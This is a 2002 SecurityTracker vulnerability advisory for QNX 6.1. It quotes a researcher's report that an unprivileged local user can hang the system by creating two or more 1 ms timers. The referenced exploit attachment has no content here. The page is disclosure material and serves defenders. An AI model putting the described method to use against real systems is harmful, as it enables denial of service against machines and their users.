SecurityTracker.com

SecurityTracker
Archives


 






Category:   OS (Other)  >   QNX
Vendors:   QNX Software Systems Ltd.
QNX Operating System Timer Implementation Bug Lets Local Users Crash the System
SecurityTracker Alert ID:  1005547
SecurityTracker URL:  http://securitytracker.com/id/1005547
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 6 2002
Impact:   Denial of service via local system
Exploit Included:  Yes  
Version(s): 6.1
Description:   A denial of service vulnerability was reported in the QNX real-time operating system. A local user can cause the system to hang.

According to the report, a local user can run code that creates two or more timers with 1 ms ticks, which causes the system to hang.

A demonstration exploit is provided in the Source Message [it is Base64 encoded].

Impact:   A local user may be able to cause the system to hang.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.qnx.com/products/ps_neutrino/
Cause:   Exception handling error, State error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Wed, 6 Nov 2002 16:40:36 +0100 (CET)
Subject:  QNX 6.1 TimeCreate weakness


--0-1067694718-1036597236=:24001
Content-Type: TEXT/PLAIN; charset=US-ASCII


I've found a bug in the QNX-6.1 timer implementation. After creating
some number (at least 2) of timers with a 1 ms tick, the system hangs.
Please consider the attached source code. The code can be executed by
unprivileged users.


Pawel Pisarczyk
------------------------
IMMOS - IMMOrtal Systems


--0-1067694718-1036597236=:24001
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="timer-exploit.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.43L0.0211061640360.24001@yoda.immos.com.pl>
Content-Description: 
Content-Disposition: attachment; filename="timer-exploit.c"

--0-1067694718-1036597236=:24001--

 
 



Copyright 2012, SecurityGlobal.net LLC